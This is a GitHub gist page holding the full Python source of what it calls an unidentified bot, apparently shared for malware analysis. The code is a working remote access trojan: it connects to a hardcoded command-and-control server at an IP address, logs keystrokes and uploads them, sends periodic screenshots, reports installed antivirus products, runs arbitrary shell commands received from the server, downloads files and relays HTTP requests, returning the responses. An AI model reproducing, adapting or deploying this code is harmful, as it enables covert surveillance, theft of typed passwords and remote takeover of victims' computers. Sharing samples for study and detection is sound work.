Skip to content

Instantly share code, notes, and snippets.

@th3gundy
Forked from usualsuspect/main.py
Created August 5, 2022 15:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save th3gundy/7ba5f8c0cf9c911f6c49c17b41b2e57b to your computer and use it in GitHub Desktop.
Save th3gundy/7ba5f8c0cf9c911f6c49c17b41b2e57b to your computer and use it in GitHub Desktop.
Undentified Python bot
import subprocess, socketio
from enum import Enum
import requests
from time import sleep
from PIL import ImageGrab
import os
from datetime import datetime, timedelta
from pynput.keyboard import Listener
allowed_methods = {
'get','post','put','options','delete','patch','head'}
class App:
VERSION = '1.0'
BASE_URL = 'http://169.239.129.108:5555'
KEYLOG_SECONDS_TO_SEND = 8
KEYLOG_SECONDS_TO_LOOP_SLEEP = 60
SC_SHOTS_SENDING_IN_SECONDS = 600
SIO_INSTANCE = None
KEYLOG_BUFFER_SIZE = 603366
@classmethod
def get_config_from_server(cls):
"""
Get client config from server.
"""
try:
res = requests.get(f"{cls.BASE_URL}/client/config")
except Exception as e:
try:
return
finally:
e = None
del e
else:
if res.status_code != 200:
return
res_json = res.json()
cls.update(data=res_json)
@classmethod
def update(cls, *, data: dict):
"""
Update Config static variables.
:param data: should be dict and include one of those keys: (key_logs_minutes,
screen_shots_minutes, base_url)
"""
cls.KEYLOG_SECONDS_TO_SEND = data.get('key_logs_minutes', cls.KEYLOG_SECONDS_TO_SEND) * 60
cls.SC_SHOTS_SENDING_IN_SECONDS = data.get('screen_shots_minutes', cls.SC_SHOTS_SENDING_IN_SECONDS) * 60
cls.BASE_URL = data.get('base_url', cls.BASE_URL)
def request(*, method, url, headers=None, payload=None, query=None):
"""
made http/s requests.
:param method: str, the method name
:param url: str, the url.
:param payload: dict, the url to send.
:param query: dict, optional to send query params in organized way.
:param headers: dict, for adding special headers
:return: request response, or None if request went wrong.
"""
req_func = getattr(requests, method)
req_params = {}
req_params.update({'json': payload}) if payload else None
req_params.update({'query': query}) if query else None
req_params.update({'headers': headers}) if query else None
try:
res = req_func(url, **req_params)
except ConnectionError as e:
try:
return
finally:
e = None
del e
else:
return res
class Actions:
@staticmethod
def pull_file_http(data: dict) -> None:
"""
in pull action, data should contain file that contain the file name
"""
base_url = f"{App.BASE_URL}/static/downloads/"
r = requests.get(f"{base_url}{data.get('file')}")
if r.status_code != 200:
return
filename = r.url.split('/')[-1]
with open(f"./{filename}", 'wb') as f:
f.write(r.content)
@staticmethod
def save_file_from_socket(data: dict) -> None:
"""
in pull action, data should contain file that contain the file name.
"""
print(f"write binary file -> {data.get('file')}")
with open(f"./{data.get('file')}", 'wb') as f:
f.write(data.get('file_data'))
@staticmethod
def made_requests(data) -> None:
"""
made chosen request http/s request
"""
headers, url, method = data.get('headers'), data.get('url'), data.get('method', '').lower()
payload = data.get('payload')
if not url or method not in allowed_methods:
return
res = request(url=url, method=method, headers=headers, payload=payload)
if not res:
return
body = res.text
file_name = str(datetime.now())
payload = {'file_name':file_name, 'file_html':body}
request(url=f"{App.BASE_URL}/client/upload_html", method='post', payload=payload)
@staticmethod
def none(*a, **k):
print('none action been called !!')
class Command(Enum):
def __new__(cls, command_number: str, func: callable):
"""
bind special attribute to enum properties.
:param command_number: the command Identifier.
:param func: function, the function to call, when command need to be running.
NOTE!! all Actions should get data attribute.
"""
enum_field_obj = object.__new__(cls)
enum_field_obj.command_number = command_number
enum_field_obj._value_ = command_number
enum_field_obj.run = func
return enum_field_obj
PULL = (
1, Actions.pull_file_http)
PULL_SOCKET = (2, Actions.save_file_from_socket)
MADE_REQUEST = (3, Actions.made_requests)
RUN_FILE = (5, Actions.none)
@classmethod
def numbers(cls) -> set:
"""
return all types of commands numbers
"""
return {attr.command_number for attr in cls}
class KeyRecorder:
def __init__(self):
self.recorder = ''
self.last_time_key_pressed = datetime.now()
self.thread = None
def on_press(self, key):
self.last_time_key_pressed = datetime.now()
if getattr(key, 'char', None):
self.recorder += key.char
else:
if getattr(key, 'name', None):
self.recorder += f"|{key.name}|"
@property
def buffer_is_bigger_then_threshold(self):
"""
check if recorder is bigger then buffer_threshold.
"""
return len(self.recorder) > App.KEYLOG_BUFFER_SIZE
@property
def report_threshold_time(self):
return datetime.now() - timedelta(seconds=(App.KEYLOG_SECONDS_TO_SEND))
@property
def is_time_for_to_report(self) -> bool:
"""
return True if it is the time to send recorder to server, else False
it will return true if there is some data to send and time passed the threshold_time
"""
return self.recorder and self.last_time_key_pressed < self.report_threshold_time
def clear_recorder(self):
"""
Clear recorder string
"""
self.recorder = ''
def start_recording(self):
"""
Start async recording.
"""
self.thread = Listener(on_press=(self.on_press))
self.thread.IS_TRUSTED = True
self.thread.start()
def create_key_recorder():
key_recorder = KeyRecorder()
key_recorder.start_recording()
return key_recorder
def take_sc_snaps():
"""
On mac its need permissions
"""
size = (1100, 1100)
while True:
sleep(App.SC_SHOTS_SENDING_IN_SECONDS)
try:
screenshot = ImageGrab.grab()
screenshot.thumbnail(size)
App.SIO_INSTANCE.emit('sc_snap', {'image_data':screenshot.tobytes(), 'size':screenshot.size,
'mode':screenshot.mode})
except Exception as e:
try:
pass
finally:
e = None
del e
def run_key_recorder():
"""
recorder
"""
key_recorder = create_key_recorder()
while True:
if key_recorder.is_time_for_to_report:
recorder = key_recorder.recorder
try:
App.SIO_INSTANCE.emit('key_recorder', {'data': recorder})
except Exception as e:
try:
pass
finally:
e = None
del e
else:
key_recorder.clear_recorder()
else:
if key_recorder.buffer_is_bigger_then_threshold:
key_recorder.clear_recorder()
sleep(App.KEYLOG_SECONDS_TO_LOOP_SLEEP)
def get_install_antivirus():
"""
get installed antivirus.
send payload -> {<type: name of anti, str>, <enable: is enable or disable, bool>}
"""
if os.name != 'nt':
print('OS is not windows')
return
import pythoncom
pythoncom.CoInitialize()
from windows_tools import antivirus
installed_antivirus = antivirus.get_installed_antivirus_software()
anti_viruses = {}
for antivirus in installed_antivirus:
if antivirus.get('name') in anti_viruses:
anti_viruses[antivirus.get('name')] = anti_viruses.get('enabled') or antivirus.get('enabled', False)
else:
if antivirus.get('name') is not None:
anti_viruses[antivirus.get('name')] = antivirus.get('enabled', False)
else:
sleep(3)
try:
App.SIO_INSTANCE.emit('anti_viruses', {'data': anti_viruses})
except Exception as e:
try:
pass
finally:
e = None
del e
App.SIO_INSTANCE = socketio.Client()
@App.SIO_INSTANCE.event
def message(data):
print('I received a message!')
@App.SIO_INSTANCE.event
def connect():
print("I'm connected!")
@App.SIO_INSTANCE.on('command')
def on_command(data: dict):
"""
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >}
"""
print(f"I received a message! {data}")
command = data.get('hi')
_id = data.get('id')
if not command:
return
if command == 'what is my version':
App.SIO_INSTANCE.emit('response', {'result':f"my version is - {App.VERSION}", 'id':_id})
return
try:
result = subprocess.check_output(command, stderr=(subprocess.STDOUT), shell=True)
except Exception as e:
try:
result = str(e).encode()
finally:
e = None
del e
else:
if len(result) == 0:
result = 'OK'.encode()
else:
App.SIO_INSTANCE.emit('response', {'result':result, 'id':_id})
return [
{'result': result}]
@App.SIO_INSTANCE.on('action')
def on_action(data: dict):
"""
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >}
"""
action_number = data.pop('action_number', None)
if action_number not in Command.numbers():
return 'not found action'
Command(action_number).run(data)
print(f"I received a message! {data}")
@App.SIO_INSTANCE.on('config')
def on_config(data: dict):
"""
Data: dict in this format -> {'<setting arg>: value'...}
"""
App.update(data=data)
print(f"I received a message! {data}")
@App.SIO_INSTANCE.event
def connect_error(data):
print('The connection failed!')
@App.SIO_INSTANCE.event
def disconnect():
print("I'm disconnected!")
App.get_config_from_server()
App.SIO_INSTANCE.connect((App.BASE_URL), transports=['polling', 'websocket'])
print('my sid is', App.SIO_INSTANCE.sid)
App.SIO_INSTANCE.start_background_task(target=take_sc_snaps)
App.SIO_INSTANCE.start_background_task(target=run_key_recorder)
App.SIO_INSTANCE.start_background_task(target=get_install_antivirus)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment